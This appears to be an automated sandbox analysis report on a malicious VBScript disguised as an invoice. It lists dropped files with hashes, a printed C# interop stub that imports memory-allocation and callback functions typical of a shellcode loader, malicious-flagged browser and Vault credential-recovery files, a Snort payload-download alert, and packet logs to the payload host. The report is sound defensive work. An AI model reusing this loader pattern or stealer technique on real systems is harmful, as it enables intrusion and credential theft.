Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjjzqpmp.eor.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1157260505480093
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryohak7YnqqDGPN5Dlq5J:+RI+ycuZhNShakSDGPNnqX
MD5:	1742F988CBD29701FFB91A8576CF1489
SHA1:	4F47DA1B8F51545EB0A880F85FFDB30FA5872A66
SHA-256:	F6CAFACBBAE7CC3A3CA7D60CD8B15B5AC6D33464BE90B29D1CB3DFBB33EB2732
SHA-512:	779D603CE8B95F7519B617157B02A18D9563DE2EE003F704A39179606612F69F3F1578AF3D2B277062926AF0741D212D73D13DF7511C713DC327D104C79489AD
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.k.b.1.w.f.d.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.k.b.1.w.f.d.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	882
Entropy (8bit):	5.226399550729973
Encrypted:	false
SSDEEP:	24:Jo1SGv76URmgkr7nv76zLu+yNp2vHNKgs2qz6LgdaD:Jo1SGz6emhr7nz6zjyqVFUu
MD5:	EA505B82FAD07E00D99FD3C7A36FF79A
SHA1:	68B8F59916AFB004F83158D741B1C75E02F2E83B
SHA-256:	AC0F5F6D3627B4F5F33695E43875609817401A6BF61B88B7193600FCC07AD50A
SHA-512:	BF5CA9FF4B2B5F95A04901F20869E1AB2119A0A569CFF032E8048260A11FE7E87DCB9112A2E20632A830D95353D2CB810DC1571B0091D828FFFBB61DBDE6F0DD
Malicious:	false
Preview:	.using System;..using System.Runtime.InteropServices;..public static class chondroga1..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int chondroga6,ref Int32 Clathra4,int Varedekla,ref Int32 chondroga,int Outhowling5,int chondroga7);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Varedekla0,uint Varedekla1,IntPtr Varedekla2,ref Int32 Varedekla3,int Varedekla4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Varedekla5,int Varedekla6);....}

C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.312320194781695
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fBrLmzxs7+AEszICN23fBrL7n:p37Lvkmb6KmcWZE75
MD5:	3E0AC72E3391C76EE61B8064C6AF7A1C
SHA1:	FBC909C18C9530277C99A8143BF2C2218A460F2D
SHA-256:	182C7AD9D14F572F91D307A742F6729FFA9431C17BC87F629F7F6320B0116D1B
SHA-512:	282AC8780E407AB9141509853B92E80B30D7D799C03DE28F49C041638756B3B9DAE430E339ACB90728E625F4C2597B61F67EF05308C3F387F0647ADEB5EC4E74
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.0.cs"

C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.2774962950991537
Encrypted:	false
SSDEEP:	48:61HPW4BCJTLrL9Cz3K4j5SuJYFO1ulSha3D6q:8W3J/H9iSl4hKD
MD5:	6BB978469690727BC92CAE82866357B8
SHA1:	9EB04A42450F2FB98D9A8DB80AF028BE3BFF52AB
SHA-256:	E2BC9EED112AAE97F4A4E14C5C026A82AED7FA98F66F4788FACD17643FC443FF
SHA-512:	4EE79D6216D705074D2A420006E0CD7671C07C95149993AF01848954F4442CA499F14B60E6B6E21D2A9D5ABBC73F4CB63F9B6EC04BD152656B659CC8AE92BCE5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....gzb...........!.................%... ...@....... ....................................@.................................l%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~..l...(...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................2.+.................\|.....\|.......................................... 9............ D............ I............ a.!.......... f.+.......r.....z................................ ..r.....z...............................

C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	870
Entropy (8bit):	5.334228913964524
Encrypted:	false
SSDEEP:	24:KSqd3ka6KmNE78Kax5DqBVKVrdFAMBJTH:dika6PNE78K2DcVKdBJj
MD5:	8DE9F174C3DC28200283098931B94E38
SHA1:	EAB4B875FF20C3CCBCEBBA47132DBF735784BF16
SHA-256:	0C93904F07F64A35E2ACBC7E5B0642E8E404494D480AD0D571B72A1DBB04D4C3
SHA-512:	F7CFD263952927913BC9BF7219937B442D1887901E00713D42A0836897C07D8EF704E4C2A9BCD5C29CB26CBAD269FCE9AAE78AA1FBBBB6F2D7EB236502D1E06D
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogim.jpeg

Download File

Process:	C:\Windows\SysWOW64\chkdsk.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1920x1080, frames 3
Category:	dropped
Size (bytes):	127946
Entropy (8bit):	7.770343991302179
Encrypted:	false
SSDEEP:	3072:cRhwWC2kSbjowaJn6QqR1ST5YeyLzHkSmGA+0LqUPJsJed:yE2kSwwa61eWD90mUP6Jed
MD5:	C0F165FAD0210E1085115696F28226DC
SHA1:	5887A72BE757A97B10B46A9D8B2F0029757E1E12
SHA-256:	CC0C4BB2C1EFD44DCD69E3B7D64CB717B04CDD69E1C1B6D74E8EAFC994ACCF23
SHA-512:	5A62311267950B8965E8FED8C74E752F5D7961451BEB6FF8514A30A411040F225DF85E602EF6B0AAB7EA3FE93739862277C6D25980A8DDCAE13DD7B05DBD6174
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......8...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?0.Z.oaqs......21....}.ZM:...[+J}#.G.y.+...p.....Mb.3(...l.......;g.$~.....m.....~....8.r.CY.+Gm}.j..wj7M..\|r...WJ...g..(.IX(..b..^i(...=?.o...~......<.....V..y.....A.....e.f..f.zK..Z.I...R..X.......g.b?......=oI..K.?...}.6.$c...p....S.Q.....9V3.O.V......E-...p.QE..QW.[X...;Y..#`...T...7.W4.M..q......O[...?.........?.......g...b..?{..#.A..k.\|

C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrf.ini

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:VSiftlAlGQJhIl:VSVlGQPY
MD5:	2F245469795B865BDD1B956C23D7893D
SHA1:	6AD80B974D3808F5A20EA1E766C7D2F88B9E5895
SHA-256:	1662D01A2D47B875A34FC7A8CD92E78CB2BA7F34023C7FD2639CBB10B8D94361
SHA-512:	909F189846A5D2DB208A5EB2E7CB3042C0F164CAF437E2B1B6DE608C0A70E4F3510B81B85753DBEEC1E211E6A83E6EA8C96AFF896E9B6E8ED42014473A54DC4F
Malicious:	true
Preview:	....F.i.r.e.f.o.x. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrg.ini

Download File

Process:	C:\Windows\SysWOW64\chkdsk.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.7883088224543333
Encrypted:	false
SSDEEP:	3:rFGQJhIl:RGQPY
MD5:	4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1:	1E332822167C6F351B99615EADA2C30A538FF037
SHA-256:	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512:	EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious:	false
Preview:	....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogri.ini

Download File

Process:	C:\Windows\SysWOW64\chkdsk.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:+slXllAGQJhIl:dlIGQPY
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrv.ini

Download File

Process:	C:\Windows\SysWOW64\chkdsk.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.96096404744368
Encrypted:	false
SSDEEP:	3:AJlbeGQJhIl:tGQPY
MD5:	BA3B6BC807D4F76794C4B81B09BB9BA5
SHA1:	24CB89501F0212FF3095ECC0ABA97DD563718FB1
SHA-256:	6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
SHA-512:	ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
Malicious:	true
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....

Static File Info

General

File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	4.783519118829289
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	WWVN_INVOICE_8363567453.vbs
File size:	233243
MD5:	9f8e253fd51c33a2f874942ebc0d3795
SHA1:	6868a9005489e56542cf0df063985132fef50f3d
SHA256:	c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37
SHA512:	eb61932008b275fde416e7e9df71b0efaec9feeb1a33af8b98d6c582fad3a9bc91cfd4450589d3fb0a7cb6601d967c8ffa5f6d023cbbf167f2eb1ac35b054b8c
SSDEEP:	3072:pzLcTyRQ+PUQSsYwqV0SuKiSMq+fxS9XZgrrfIhAvL18lALuDYx7Pu2nNQ:pzPRQ+Qp3ZCtG2+
TLSH:	C434FBC0521D19EA8298D58CBCD432AA0F5798DDFA07F96E93A05F6F1390023BD8DD5B
File Content Preview:	'IRIDI LLAN bedgownd Misdem rvful Huntsville chor LANDSFO Aftere Klito4 Agterin LEON stavep TROER corrective ADIPS form ..'Salonrifel9 till monorimeek Ungef7 unikae FJERNKONT NYTAARSTAL Monoxylone telfonm EVECKMI pligtigts GRIDDLEB flgeska KILLBUCK Fascio

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20203.170.86.8949759802842115 05/10/22-14:22:49.687558	TCP	2842115	ETPRO TROJAN MalDoc Requesting Payload 2020-04-21	49759	80	192.168.11.20	203.170.86.89

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2022 14:22:49.482075930 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:49.686078072 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.686454058 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:49.687557936 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:49.891508102 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895020962 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895107031 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895168066 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895227909 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895251036 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:49.895288944 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895314932 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:49.895350933 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895411968 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895472050 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895483971 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:49.895531893 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895534039 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:49.895560980 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:49.895595074 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:49.895683050 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:49.895760059 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:49.895817041 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.099534988 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.099678040 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.099735022 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.099734068 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.099786997 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.099838018 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.099842072 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.099899054 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.099950075 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.099973917 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.100002050 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100044966 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.100054979 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100107908 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100147963 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.100158930 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100193024 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.100213051 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100265026 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100316048 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100367069 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100419044 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100471020 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100521088 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100572109 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100624084 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.100817919 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.100864887 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.100877047 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.101032019 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.304229021 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304269075 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304305077 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304327965 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304352999 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304373026 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304413080 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304425001 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.304440975 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304445028 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.304461956 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304483891 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304514885 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304536104 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304563046 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.304564953 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304585934 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304589033 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.304615021 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304635048 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304672956 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304692984 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304719925 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304738998 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304744005 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.304779053 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.304786921 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304824114 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304843903 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304869890 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.304877996 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304899931 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304919004 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304939032 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304958105 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304959059 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.304977894 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.304997921 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305018902 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305033922 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.305038929 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305058956 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305078030 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305097103 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305105925 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.305118084 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305136919 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305156946 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305193901 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305213928 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.305217981 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.305386066 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.508820057 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.508963108 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509033918 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509098053 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509140015 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.509177923 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509216070 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.509289980 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509342909 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509381056 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.509449005 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509454012 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.509495974 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509541988 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509593010 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509614944 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.509632111 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509752035 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.509788990 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.509836912 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.509884119 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510013103 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510040045 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.510060072 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510102034 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.510106087 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510152102 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510164022 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.510183096 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.510209084 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510255098 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510260105 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.510301113 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510346889 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510392904 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510431051 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.510437965 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510519028 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510566950 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510612011 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510657072 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510700941 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510746002 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510790110 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510838032 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510881901 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510906935 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.510921001 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.510927916 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.510973930 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511013031 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511020899 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511049986 CEST	49759	80	192.168.11.20	203.170.86.89
